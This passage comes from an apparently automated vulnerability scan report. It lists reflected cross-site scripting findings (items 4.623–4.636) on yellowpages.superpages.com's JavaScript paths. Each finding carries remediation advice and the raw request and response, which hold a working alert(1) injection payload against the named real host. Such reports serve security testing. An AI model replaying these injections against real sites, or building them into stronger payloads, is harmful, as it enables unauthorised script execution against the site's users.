Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsbb37a&quot;-alert(1)-&quot;32622685d4e/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=20AEC5B794C7F22300B4AB7C1BE8B541; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsbb37a"-alert(1)-"32622685d4e/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/s_code.jsb38e5&quot;-alert(1)-&quot;7e6c3fe42b7
Server: Unspecified
Set-Cookie: JSESSIONID=7C8652CC4A96C376FF779F3B2EFDF4DA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:53 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common77bf9&quot;-alert(1)-&quot;8dab2c2c71d/js/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=983DC2F2B845AB07443C74AFEC6EC3C9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:31 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js1f6a0&quot;-alert(1)-&quot;aaabf2e973b/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=6CD48A2FE82530486D8D85DC245C52C4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:38 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/sendtom.jseabbc&quot;-alert(1)-&quot;b304378f63d
Server: Unspecified
Set-Cookie: JSESSIONID=74A77B104A3B996CCA486703E507CA88; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/sendtom.jseabbc"-alert(1)-"b304378f63d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4461d&quot;-alert(1)-&quot;6930c85dd26/js/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F173D17509F7FCAEF102A94A23B8CBF8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js91df3&quot;-alert(1)-&quot;e8a95c1c0a9/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F03C23C51384E7387839BE0403233F2F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/spflyouts.1.0.js2cc0a&quot;-alert(1)-&quot;689c16f939c
Server: Unspecified
Set-Cookie: JSESSIONID=6AC921D19E8E658E299A352472A367AB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common98ab9&quot;-alert(1)-&quot;d45a7fa5aaf/js/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=36DFAAE7A032362EAD1EE07FE700AD0E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdf462&quot;-alert(1)-&quot;539d2934731/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=C59E3AC4220944843B48F6BB847E4A3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:35 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdf462"-alert(1)-"539d2934731/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/swfobject.js8519c&quot;-alert(1)-&quot;64c92015151
Server: Unspecified
Set-Cookie: JSESSIONID=534F43F8840C3F0B4E24401AC93C69ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/swfobject.js8519c"-alert(1)-"64c92015151?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common633b9&quot;-alert(1)-&quot;357d38575b/js/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=EF961C373B22D3D46A32D7CCF7FFBD15; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:08 GMT
Cache-Control: private
Content-Length: 36075


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common633b9"-alert(1)-"357d38575b/js/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdfd66&quot;-alert(1)-&quot;3845f6ea7bb/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=0081BD1CF81E1EE984F6C8482C688002; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:16 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/widget.jsbcb24&quot;-alert(1)-&quot;a6a108b5958
Server: Unspecified
Set-Cookie: JSESSIONID=843B6CF9DEDBEBDE61C92986F1356639; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:23 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/widget.jsbcb24"-alert(1)-"a6a108b5958?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
